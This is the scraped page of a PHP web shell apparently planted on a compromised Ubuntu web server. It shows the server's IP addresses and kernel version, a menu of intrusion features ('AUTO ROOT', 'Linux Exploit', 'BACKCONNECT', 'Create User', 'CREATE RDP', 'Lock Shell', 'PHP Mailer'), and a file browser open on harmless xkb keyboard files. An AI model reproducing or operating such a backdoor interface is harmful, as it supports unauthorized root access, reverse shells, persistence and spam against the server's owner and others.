Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.79.214
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
snap /
core /
17200 /
usr /
share /
X11 /
xkb /
compat /
[ HOME SHELL ]
Name
Size
Permission
Action
README
1.67
KB
-rw-r--r--
accessx
1.09
KB
-rw-r--r--
basic
1.03
KB
-rw-r--r--
caps
507
B
-rw-r--r--
complete
228
B
-rw-r--r--
iso9995
1.61
KB
-rw-r--r--
japan
986
B
-rw-r--r--
ledcaps
469
B
-rw-r--r--
lednum
466
B
-rw-r--r--
ledscroll
486
B
-rw-r--r--
level5
1.36
KB
-rw-r--r--
misc
2.66
KB
-rw-r--r--
mousekeys
4.5
KB
-rw-r--r--
olpc
1.11
KB
-rw-r--r--
pc
340
B
-rw-r--r--
pc98
1.2
KB
-rw-r--r--
xfree86
1.8
KB
-rw-r--r--
xtest
1.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : basic
// Minimal set of symbol interpretations to provide // reasonable default behavior (Num lock, Shift lock, // Caps lock, and Mode switch) and set up the // automatic updating of common keyboard LEDs. default xkb_compatibility "basic" { virtual_modifiers NumLock,AltGr; interpret.repeat= False; setMods.clearLocks= True; latchMods.clearLocks= True; latchMods.latchToLock= True; interpret Shift_Lock+AnyOf(Shift+Lock) { action= LockMods(modifiers=Shift); }; interpret Any+Lock { action= LockMods(modifiers=Lock); }; interpret Num_Lock+Any { virtualModifier= NumLock; action= LockMods(modifiers=NumLock); }; interpret Mode_switch { useModMapMods= level1; virtualModifier= AltGr; action= SetGroup(group=+1); }; interpret Any + Any { action= SetMods(modifiers=modMapMods); }; group 2 = AltGr; group 3 = AltGr; group 4 = AltGr; include "ledcaps" include "lednum" indicator "Shift Lock" { !allowExplicit; whichModState= Locked; modifiers= Shift; }; };
Close